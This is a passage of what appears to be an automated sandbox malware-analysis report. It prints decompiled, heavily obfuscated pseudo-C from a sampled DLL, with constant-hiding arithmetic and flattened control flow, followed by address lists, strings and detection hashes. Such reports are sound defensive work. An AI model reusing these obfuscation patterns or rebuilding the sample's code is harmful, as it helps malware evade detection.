				signed int _t206;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t168);
				_v48 = 0xcd00f6;
				_v48 = _v48 + 0xcd83;
				_v48 = _v48 ^ 0x09b3856c;
				_v48 = _v48 ^ 0x097e4b14;
				_v68 = 0x47ecc1;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x0000069b;
				_v56 = 0x5623e4;
				_t204 = 0x5e;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x07a7b883;
				_v60 = 0x9f93bd;
				_v60 = _v60 ^ 0x1b2b58cc;
				_v60 = _v60 ^ 0x1bb3b428;
				_v36 = 0x1947a4;
				_v36 = _v36 | 0x7bdfb0e1;
				_v36 = _v36 ^ 0x7bdfc232;
				_v52 = 0x76ccb;
				_v52 = _v52 * 0x2b;
				_v52 = _v52 ^ 0x7f6a3668;
				_v52 = _v52 ^ 0x7e52560e;
				_v24 = 0x419396;
				_v24 = _v24 / _t204;
				_t205 = 0x46;
				_v24 = _v24 * 0x57;
				_v24 = _v24 ^ 0x845af85c;
				_v24 = _v24 ^ 0x84646483;
				_v16 = 0xd7b9b6;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x000408e3;
				_v44 = 0x89b89f;
				_v44 = _v44 * 0x1b;
				_v44 = _v44 / _t205;
				_v44 = _v44 ^ 0x00329adc;
				_v40 = 0x7c911;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0x9fb7bc96;
				_v40 = _v40 ^ 0x9fbb58de;
				_v32 = 0x2960c2;
				_v32 = _v32 >> 0xd;
				_t206 = 0x3b;
				_v32 = _v32 * 0x6a;
				_v32 = _v32 ^ 0x000737d7;
				_v8 = 0x50758c;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 / _t206;
				_v8 = _v8 + 0xffffa1a5;
				_v8 = _v8 ^ 0x002c6c3d;
				_v72 = 0xae2241;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x0004039d;
				_v28 = 0x59a91e;
				_v28 = _v28 * 0x35;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 + 0x675a;
				_v28 = _v28 ^ 0x00026f30;
				_v64 = 0xf7748e;
				_v64 = _v64 * 0x37;
				_v64 = _v64 ^ 0x3526d747;
				_v20 = 0x936b67;
				_v20 = _v20 + 0xffff21a6;
				_v20 = _v20 + 0x6733;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x0025db68;
				_v12 = 0x60291e;
				_v12 = _v12 + 0xffffd016;
				_v12 = _v12 << 9;
				_v12 = _v12 + 0xffff2f3b;
				_v12 = _v12 ^ 0xbff2968b;
				E0087FE2A(_v60, _v36, 0x1e,  &_v104);
				E0087FE2A(_v52, _v24, 0x208,  &_v624);
				E0087FE2A(_v16, _v44, 0x208,  &_v1144);
				E0086E204(_v40, _v32,  &_v624, _a4);
				E0086E204(_v8, _v72,  &_v1144, _a12);
				_v100 = _v48;
				_v96 =  &_v624;
				_v92 =  &_v1144;
				_v88 = _v56 | _v68 | 0x00000410;
				_t200 = E0086E4F8( &_v104, _v28, _v64, _v20, _v12);
				asm("sbb eax, eax");
				return  ~_t200 + 1;
			}

0x00876554
0x00876557
0x0087655a
0x0087655d
0x0087655e
0x0087655f
0x00876564
0x0087656d
0x00876574
0x0087657b
0x00876582
0x00876589
0x0087658d
0x00876594
0x008765a1
0x008765a4
0x008765a7
0x008765ab
0x008765b2
0x008765b9
0x008765c0
0x008765c7
0x008765ce
0x008765d5
0x008765dc
0x008765e7
0x008765ea
0x008765f1
0x008765f8
0x00876606
0x0087660d
0x00876610
0x00876613
0x0087661a
0x00876621
0x00876628
0x0087662c
0x00876630
0x00876634
0x0087663b
0x00876646
0x00876650
0x00876653
0x0087665a
0x00876661
0x00876665
0x0087666c
0x00876673
0x0087667a
0x00876682
0x00876683
0x00876686
0x0087668d
0x00876698
0x008766a0
0x008766a3
0x008766aa
0x008766b1
0x008766b8
0x008766bc
0x008766c3
0x008766ce
0x008766d1
0x008766d5
0x008766dc
0x008766e3
0x008766ee
0x008766f4
0x008766fb
0x00876702
0x00876709
0x00876710
0x00876714
0x0087671b
0x00876722
0x00876729
0x0087672d
0x00876734
0x00876744
0x0087675c
0x0087676f
0x00876784
0x00876799
0x008767a4
0x008767ad
0x008767b6
0x008767ca
0x008767d4
0x008767de
0x008767e5

Strings

=l,, xrefs: 008766AA
#V, xrefs: 00876594

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: =l,$#V
API String ID: 0-882995766
Opcode ID: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction ID: 41c3e7c9ad1c42c37ff8e107c7d5e58a5f5dcbc98266b130a9f48bd38bb26a2d
Opcode Fuzzy Hash: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
Instruction Fuzzy Hash: 0D81FFB1D0120DEBCF08CFA5D98A8EEBBB5FF44308F208159E515BA260D7B45A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 008707F4, Relevance: 2.6, Strings: 2, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E008707F4() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _t88;
				intOrPtr _t89;
				void* _t96;
				signed int _t101;
				signed int _t112;
				short* _t113;
				signed int* _t116;

				_t116 =  &_v552;
				_v548 = 0x5918d1;
				_v548 = _v548 + 0xe8d9;
				_t96 = 0x413edd5;
				_v548 = _v548 * 7;
				_v548 = _v548 | 0xf342c850;
				_v548 = _v548 ^ 0xf3753354;
				_v544 = 0x3961e1;
				_t112 = 0x6c;
				_v544 = _v544 * 0x6e;
				_v544 = _v544 * 0x7b;
				_v544 = _v544 ^ 0xd8b8e625;
				_v528 = 0xb40301;
				_v528 = _v528 ^ 0x18f013f2;
				_v528 = _v528 + 0xffff1b00;
				_v528 = _v528 ^ 0x184a596c;
				_v532 = 0x9ab5ff;
				_v532 = _v532 + 0x870f;
				_v532 = _v532 + 0xffff8f3e;
				_v532 = _v532 ^ 0x0099ca27;
				_v524 = 0x5ab638;
				_v524 = _v524 + 0xffff3304;
				_v524 = _v524 ^ 0x005bd322;
				_v536 = 0x9f91e6;
				_t113 = _v524;
				_v536 = _v536 / _t112;
				_v536 = _v536 >> 2;
				_v536 = _v536 ^ 0x000cbfb4;
				_v540 = 0xcf5411;
				_t88 = _v540 * 0x37;
				_v540 = _t88;
				_v540 = _v540 ^ 0x69295e57;
				_v540 = _v540 ^ 0x45a0f7a2;
				L1:
				while(_t96 != 0x413edd5) {
					if(_t96 == 0x66ebf40) {
						_t88 = E00880DB1(_v548,  &_v520, __eflags, _v544, _t96, _v528);
						_t116 =  &(_t116[3]);
						_t96 = 0xe87ba20;
						continue;
					}
					if(_t96 == 0x9062539) {
						_t89 =  *0x886214; // 0x0
						__eflags = _t89 + 0x23c;
						return E0086E204(_v536, _v540, _t89 + 0x23c, _t113);
					}
					if(_t96 != 0xe87ba20) {
						L15:
						__eflags = _t96 - 0xf0f6a33;
						if(__eflags != 0) {
							continue;
						}
						return _t88;
					}
					_v552 = 0x64b67d;
					_t101 = 0x4d;
					_v552 = _v552 / _t101;
					_v552 = _v552 << 1;
					_v552 = _v552 + 0xa638;
					_v552 = _v552 ^ 0x000343e6;
					_t113 =  &_v520 + E008700C5( &_v520, _v532, _v524) * 2;
					while(1) {
						_t88 =  &_v520;
						if(_t113 <= _t88) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L8:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t74 =  &_v552;
						 *_t74 = _v552 - 1;
						__eflags =  *_t74;
						if( *_t74 == 0) {
							__eflags = _t113;
							L12:
							_t96 = 0x9062539;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t96 = 0x66ebf40;
				goto L15;
			}

0x008707f4
0x008707fa
0x00870804
0x0087080c
0x0087081a
0x00870823
0x00870830
0x0087083d
0x0087084c
0x0087084d
0x00870856
0x0087085a
0x00870862
0x0087086a
0x00870872
0x0087087a
0x00870882
0x0087088a
0x00870892
0x0087089a
0x008708a2
0x008708aa
0x008708b2
0x008708ba
0x008708c8
0x008708cc
0x008708d0
0x008708d5
0x008708dd
0x008708e5
0x008708ea
0x008708ee
0x008708f6
0x00000000
0x008708fe
0x0087090c
0x00870998
0x0087099d
0x008709a0
0x00000000
0x008709a0
0x00870910
0x008709b7
0x008709c0
0x00000000
0x008709d1
0x00870918
0x008709a9
0x008709a9
0x008709af
0x00000000
0x00000000
0x00000000
0x008709af
0x0087091e
0x0087092e
0x00870935
0x00870939
0x0087093d
0x00870945
0x0087095f
0x00870973
0x00870973
0x00870979
0x00000000
0x00000000
0x00870964
0x00870968
0x00870970
0x00870970
0x00870970
0x00000000
0x00870970
0x0087096a
0x0087096a
0x0087096a
0x0087096e
0x0087097d
0x00870980
0x00870980
0x00000000
0x00870980
0x00000000
0x0087096e
0x00000000
0x0087097b
0x008709a7
0x00000000

Strings

a9, xrefs: 0087083D
W^)i, xrefs: 008708EE

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: W^)i$a9
API String ID: 0-1728637351
Opcode ID: f8a3e4a0fe3ee0544bfcde5ee2392bf7dcd10f166cf59088d0e4676bbe922ff7
Instruction ID: d97356c8ff7571a36ab9d09f3c08c4ede25b295e98cbe72ee25075c821aae5ca
Opcode Fuzzy Hash: f8a3e4a0fe3ee0544bfcde5ee2392bf7dcd10f166cf59088d0e4676bbe922ff7
Instruction Fuzzy Hash: E1416471508301CBD754CF24D58992BBBE1FBC4358F148A1EF19AA6265D370EA4A8F86

Uniqueness

Uniqueness Score: -1.00%

Function 00875333, Relevance: 2.6, Strings: 2, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00875333(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t101;
				void* _t104;
				signed int _t105;
				signed int _t106;
				void* _t108;
				void* _t116;
				void* _t117;
				signed int* _t119;

				_t108 = __ecx;
				_t119 =  &_v40;
				_v16 = 0x92c19;
				_v16 = _v16 ^ 0x628de80f;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x84c9db68;
				_v4 = 0x30e06a;
				_v4 = _v4 ^ 0x4daac4de;
				_v4 = _v4 ^ 0x4d95dd20;
				_v20 = 0x313cca;
				_t105 = 0xc;
				_v20 = _v20 / _t105;
				_v20 = _v20 >> 9;
				_t116 = 0;
				_v20 = _v20 ^ 0x00013d87;
				_t117 = 0xe755a9f;
				_v40 = 0xb13641;
				_t106 = 0x59;
				_v40 = _v40 / _t106;
				_v40 = _v40 << 1;
				_v40 = _v40 | 0xaf38654a;
				_v40 = _v40 ^ 0xaf356b5c;
				_v24 = 0xb3ef74;
				_v24 = _v24 ^ 0x556457b4;
				_v24 = _v24 * 0x55;
				_v24 = _v24 ^ 0x80aa83de;
				_v28 = 0x9b3a5a;
				_v28 = _v28 + 0x3060;
				_v28 = _v28 + 0xffffd119;
				_v28 = _v28 ^ 0x00918c22;
				_v32 = 0x1265dc;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 | 0x6a7496c5;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x25b994ca;
				_v36 = 0xc9b3ee;
				_v36 = _v36 >> 5;
				_v36 = _v36 + 0x1e11;
				_v36 = _v36 << 3;
				_v36 = _v36 ^ 0x0035933c;
				_v8 = 0x402308;
				_v8 = _v8 ^ 0x846a3c70;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x2152b8ae;
				_v12 = 0xd9cdb9;
				_v12 = _v12 * 0x16;
				_v12 = _v12 | 0x05b8ac83;
				_v12 = _v12 ^ 0x17b93340;
				do {
					while(_t117 != 0xb1e0fe5) {
						if(_t117 == 0xb7b3e2e) {
							_t116 = _t116 + E0087BE8C(_t108 + 0x18, _v32, _v36, _v8, _v12);
						} else {
							if(_t117 == 0xcf04418) {
								_t104 = E0087BE8C(_t108, _v20, _v40, _v24, _v28);
								_t119 =  &(_t119[3]);
								_t117 = 0xb7b3e2e;
								_t116 = _t116 + _t104;
								continue;
							} else {
								if(_t117 != 0xe755a9f) {
									goto L8;
								} else {
									_t117 = 0xb1e0fe5;
									continue;
								}
							}
						}
						L11:
						return _t116;
					}
					_push(_t108);
					_t101 = E008707F0();
					_t119 =  &(_t119[1]);
					_t117 = 0xcf04418;
					_t116 = _t116 + _t101;
					L8:
				} while (_t117 != 0x795fd89);
				goto L11;
			}

0x00875333
0x00875333
0x00875336
0x00875340
0x00875348
0x0087534d
0x00875355
0x0087535d
0x00875365
0x0087536d
0x0087537f
0x00875384
0x0087538a
0x0087538f
0x00875391
0x00875399
0x0087539e
0x008753af
0x008753b7
0x008753bb
0x008753bf
0x008753c7
0x008753cf
0x008753d7
0x008753e4
0x008753e8
0x008753f0
0x008753f8
0x00875400
0x00875408
0x00875410
0x00875418
0x0087541d
0x00875425
0x0087542a
0x00875432
0x0087543a
0x0087543f
0x00875447
0x0087544c
0x00875454
0x0087545c
0x00875464
0x00875469
0x00875471
0x0087547e
0x00875482
0x0087548a
0x00875492
0x00875492
0x00875498
0x00875509
0x0087549a
0x008754a0
0x008754be
0x008754c3
0x008754c6
0x008754c8
0x00000000
0x008754a2
0x008754a8
0x00000000
0x008754aa
0x008754aa
0x00000000
0x008754aa
0x008754a8
0x008754a0
0x0087550b
0x00875514
0x00875514
0x008754d4
0x008754d5
0x008754da
0x008754dd
0x008754e2
0x008754e4
0x008754e4
0x00000000

Strings

j0, xrefs: 00875355
`0, xrefs: 008753F8

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: `0$j0
API String ID: 0-1706687062
Opcode ID: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction ID: 96f2ed4c312785f5bcc0e56f03570f521c955fdb29caec513970dc8d8c1645a0
Opcode Fuzzy Hash: a698ae834057bf3177c30c95693b9f296898de2c2be967a0d04c9a146b8b5e9c
Instruction Fuzzy Hash: C74157B24083019FC344DF21998944BBBE1FBD8758F118A2DF899A6260C3B1CA59CF97

Uniqueness

Uniqueness Score: -1.00%

Function 00867E79, Relevance: 2.6, Strings: 2, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00867E79(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t99;
				signed int _t101;
				void* _t105;
				signed int _t107;
				signed int _t108;
				char* _t109;
				intOrPtr* _t124;
				void* _t125;

				_t124 = __ecx;
				_v16 = 0xb54463;
				_v16 = _v16 + 0xffff3415;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 + 0xffffe11b;
				_v16 = _v16 ^ 0xfff7a701;
				_v28 = 0xd77279;
				_v28 = _v28 | 0x400730c3;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xbb990da4;
				_v36 = 0xbcfff8;
				_v36 = _v36 >> 6;
				_v36 = _v36 ^ 0x000a6762;
				_v8 = 0xf31a9;
				_v8 = _v8 + 0xffff1e98;
				_v8 = _v8 ^ 0xb4a41066;
				_v8 = _v8 | 0xf0d45968;
				_v8 = _v8 ^ 0xf4f540ba;
				_v12 = 0xc524e1;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 5;
				_t107 = 0x45;
				_v12 = _v12 / _t107;
				_v12 = _v12 ^ 0x00048931;
				_v44 = 0x28a4d;
				_v44 = _v44 + 0x8441;
				_v44 = _v44 ^ 0x00037729;
				_v20 = 0x237a7e;
				_v20 = _v20 ^ 0x3c41f8ff;
				_v20 = _v20 | 0x4ede09cf;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x01f9a400;
				_v32 = 0xc1354c;
				_v32 = _v32 ^ 0xd017d736;
				_v32 = _v32 + 0xb685;
				_v32 = _v32 ^ 0xd0d9caff;
				_v24 = 0x1c6e66;
				_v24 = _v24 + 0xffff7553;
				_t108 = 0x67;
				_t109 =  &_v304;
				_v24 = _v24 / _t108;
				_v24 = _v24 ^ 0x000aa416;
				_v40 = 0xe04b7f;
				_v40 = _v40 ^ 0x3f01302b;
				_v40 = _v40 ^ 0x3feda652;
				while(1) {
					_t99 =  *_t124;
					if(_t99 == 0) {
						break;
					}
					if(_t99 == 0x2e) {
						 *_t109 = 0;
					} else {
						 *_t109 = _t99;
						_t109 = _t109 + 1;
						_t124 = _t124 + 1;
						continue;
					}
					L6:
					_t125 = E0086801A(_v16,  &_v304, _v28);
					if(_t125 != 0) {
						L8:
						_t101 = E00863362(_t124 + 1, _v12, _v44);
						_push(_v40);
						_push(_v24);
						_push(_t101 ^ 0x31e3fec1);
						_push(_t125);
						return E0086EC31(_v20, _v32);
					}
					_t105 = E0086483C(_v36, _v8,  &_v304);
					_t125 = _t105;
					if(_t125 != 0) {
						goto L8;
					}
					return _t105;
				}
				goto L6;
			}

0x00867e84
0x00867e86
0x00867e8f
0x00867e96
0x00867e9a
0x00867ea1
0x00867ea8
0x00867eaf
0x00867eb6
0x00867eba
0x00867ec1
0x00867ec8
0x00867ecc
0x00867ed3
0x00867eda
0x00867ee1
0x00867ee8
0x00867eef
0x00867ef6
0x00867efd
0x00867f01
0x00867f0a
0x00867f0f
0x00867f14
0x00867f1b
0x00867f22
0x00867f29
0x00867f30
0x00867f37
0x00867f3e
0x00867f45
0x00867f49
0x00867f50
0x00867f57
0x00867f5e
0x00867f65
0x00867f6c
0x00867f73
0x00867f7d
0x00867f80
0x00867f86
0x00867f89
0x00867f90
0x00867f97
0x00867f9e
0x00867faf
0x00867faf
0x00867fb3
0x00000000
0x00000000
0x00867fa9
0x00867fb7
0x00867fab
0x00867fab
0x00867fad
0x00867fae
0x00000000
0x00867fae
0x00867fba
0x00867fcb
0x00867fd0
0x00867feb
0x00867ff4
0x00867ff9
0x00868001
0x0086800a
0x0086800b
0x00000000
0x00868011
0x00867fdf
0x00867fe4
0x00867fe9
0x00000000
0x00000000
0x00868019
0x00868019
0x00000000

Strings

~z#, xrefs: 00867F30
bg, xrefs: 00867ECC

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: bg$~z#
API String ID: 0-3633068236
Opcode ID: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction ID: 81dc011c7a80bfe96cf49bd14b777eb690587816335e2e1ce0594bc1ae7b3468
Opcode Fuzzy Hash: d27443a6954f6df962cc2ff153474a91a954d70af200d7c111dd209c5580846d
Instruction Fuzzy Hash: 86413571C0021EDBDF59CEA4C94A9EEBBB1FB55718F208199D451B6220C7B40B4ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00875515, Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

bWr, xrefs: 0087551E
(8r, xrefs: 00875578

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: bWr$(8r
API String ID: 0-4034592896
Opcode ID: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction ID: 3fc5b7006996adfc045600461beaa2377c3f8d328bfa3056c689fc17c9f1abc8
Opcode Fuzzy Hash: 6bd561600b29e8d40b53efd76a24b6e4d1b51c40b914b8d5291e690eb23a4ca9
Instruction Fuzzy Hash: 1A4122B1C0021DEBCF18CFA4C94A9EEBBB5FB04304F20828AE511B6264D7B45B85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0087F840, Relevance: 1.5, Strings: 1, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0087F840(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t197;
				void* _t220;
				intOrPtr* _t230;
				void* _t232;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int* _t264;

				_t230 = _a4;
				_push(_a8);
				_t252 = __ecx;
				_push(_t230);
				_push(__ecx);
				E0087FE29(_t197);
				_v16 = 0x43fd88;
				_t264 =  &(( &_v84)[4]);
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x043fd881;
				_t253 = 0;
				_v36 = 0xa6c090;
				_t232 = 0x483ab52;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 + 0x55d4;
				_v36 = _v36 ^ 0x00005b0b;
				_v48 = 0x2dc4d8;
				_t254 = 0xf;
				_v48 = _v48 / _t254;
				_v48 = _v48 + 0x1bd9;
				_v48 = _v48 ^ 0x0001e475;
				_v80 = 0x1961e0;
				_v80 = _v80 | 0x2e5a3b97;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00050c56;
				_v52 = 0x801119;
				_t255 = 0x4c;
				_v52 = _v52 * 0x3b;
				_v52 = _v52 / _t255;
				_v52 = _v52 ^ 0x006b0701;
				_v12 = 0x5b3baf;
				_v12 = _v12 + 0xffffe0d8;
				_v12 = _v12 ^ 0x0050d6d6;
				_v20 = 0xddf3bb;
				_v20 = _v20 + 0x1688;
				_v20 = _v20 ^ 0x00da105f;
				_v84 = 0xb842b2;
				_v84 = _v84 >> 3;
				_t256 = 0x6e;
				_v84 = _v84 * 0x79;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x571ab13d;
				_v56 = 0xc043e1;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x181f9cd5;
				_v56 = _v56 ^ 0x181bbe52;
				_v24 = 0xd2b7cf;
				_v24 = _v24 / _t256;
				_v24 = _v24 ^ 0x00057f60;
				_v60 = 0x8a3800;
				_v60 = _v60 >> 6;
				_v60 = _v60 | 0x8f8b2365;
				_v60 = _v60 ^ 0x8f8e0970;
				_v64 = 0xc9e96d;
				_v64 = _v64 << 0x10;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x2da69c1f;
				_v68 = 0x328e52;
				_v68 = _v68 * 0x66;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0xa1266097;
				_v28 = 0xf9277c;
				_v28 = _v28 << 0xa;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x24e98be4;
				_v72 = 0xc9ae08;
				_v72 = _v72 | 0xbe9fb7a8;
				_v72 = _v72 << 1;
				_v72 = _v72 + 0xffff17b5;
				_v72 = _v72 ^ 0x7db3cb0d;
				_v32 = 0x7a6981;
				_v32 = _v32 ^ 0xd4fdb142;
				_t257 = 0x69;
				_v32 = _v32 / _t257;
				_v32 = _v32 ^ 0x020955a0;
				_v76 = 0x732b21;
				_t258 = 0x5e;
				_v76 = _v76 / _t258;
				_t259 = 0xb;
				_v76 = _v76 / _t259;
				_v76 = _v76 + 0xb8c3;
				_v76 = _v76 ^ 0x0005bc70;
				_v8 = 0x8f6a69;
				_t260 = 0x5d;
				_v8 = _v8 / _t260;
				_v8 = _v8 ^ 0x000b5b39;
				_v40 = 0x75e3f0;
				_t261 = 0x55;
				_v40 = _v40 / _t261;
				_v40 = _v40 + 0xffff98ec;
				_v40 = _v40 ^ 0x0009f0a2;
				_v44 = 0x50946;
				_v44 = _v44 * 0x76;
				_v44 = _v44 + 0xffff2591;
				_v44 = _v44 ^ 0x0253dc14;
				do {
					while(_t232 != 0x483ab52) {
						if(_t232 == 0x71a4461) {
							_t220 = E0087A1C0(_v48, _t232, _v80, _v52, _v12,  &_v4, _v16, _v20, _v84, 0, _t232, _v56, _t252);
							_t264 =  &(_t264[0xc]);
							if(_t220 != 0) {
								_t232 = 0xc565723;
								continue;
							}
						} else {
							if(_t232 == 0xc565723) {
								_push(_t232);
								_push(_t232);
								_t253 = E0086C5D8(_v4);
								_t264 =  &(_t264[3]);
								if(_t253 != 0) {
									_t232 = 0xf0f9d9d;
									continue;
								}
							} else {
								if(_t232 != 0xf0f9d9d) {
									goto L12;
								} else {
									E0087A1C0(_v28, _t232, _v72, _v32, _v76,  &_v4, _v36, _v8, _v40, _t253, _t232, _v44, _t252);
									 *_t230 = _v4;
								}
							}
						}
						L6:
						return _t253;
					}
					_t232 = 0x71a4461;
					L12:
				} while (_t232 != 0xd0fff7e);
				goto L6;
			}

0x0087f844
0x0087f84b
0x0087f84f
0x0087f851
0x0087f853
0x0087f854
0x0087f859
0x0087f861
0x0087f864
0x0087f86b
0x0087f873
0x0087f875
0x0087f87d
0x0087f882
0x0087f887
0x0087f88f
0x0087f897
0x0087f8a5
0x0087f8aa
0x0087f8b0
0x0087f8b8
0x0087f8c0
0x0087f8c8
0x0087f8d0
0x0087f8d5
0x0087f8da
0x0087f8e2
0x0087f8ef
0x0087f8f2
0x0087f8fe
0x0087f902
0x0087f90a
0x0087f912
0x0087f91a
0x0087f922
0x0087f92a
0x0087f932
0x0087f93a
0x0087f942
0x0087f94c
0x0087f94d
0x0087f951
0x0087f956
0x0087f95e
0x0087f966
0x0087f96b
0x0087f973
0x0087f97b
0x0087f989
0x0087f98d
0x0087f995
0x0087f99d
0x0087f9a2
0x0087f9aa
0x0087f9b2
0x0087f9ba
0x0087f9bf
0x0087f9c4
0x0087f9cc
0x0087f9d9
0x0087f9dd
0x0087f9e2
0x0087f9ec
0x0087f9f4
0x0087f9f9
0x0087f9fe
0x0087fa06
0x0087fa0e
0x0087fa16
0x0087fa1a
0x0087fa22
0x0087fa2a
0x0087fa32
0x0087fa40
0x0087fa45
0x0087fa4b
0x0087fa53
0x0087fa5f
0x0087fa64
0x0087fa6e
0x0087fa73
0x0087fa79
0x0087fa81
0x0087fa89
0x0087fa95
0x0087fa9a
0x0087faa0
0x0087faa8
0x0087fab4
0x0087fabc
0x0087fac0
0x0087fac8
0x0087fad0
0x0087fadd
0x0087fae1
0x0087fae9
0x0087faf1
0x0087faf1
0x0087faff
0x0087fbb5
0x0087fbba
0x0087fbbf
0x0087fbc1
0x00000000
0x0087fbc1
0x0087fb05
0x0087fb0b
0x0087fb6d
0x0087fb6e
0x0087fb78
0x0087fb7a
0x0087fb7f
0x0087fb81
0x00000000
0x0087fb81
0x0087fb0d
0x0087fb13
0x00000000
0x0087fb19
0x0087fb42
0x0087fb51
0x0087fb51
0x0087fb13
0x0087fb0b
0x0087fb54
0x0087fb5c
0x0087fb5c
0x0087fbcb
0x0087fbcd
0x0087fbcd
0x00000000

Strings

!+s, xrefs: 0087FA53

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !+s
API String ID: 0-2041718826
Opcode ID: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction ID: d0cb30969dc26bb3492aa29086aa690318c2599e7987ab915ded065c26989627
Opcode Fuzzy Hash: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
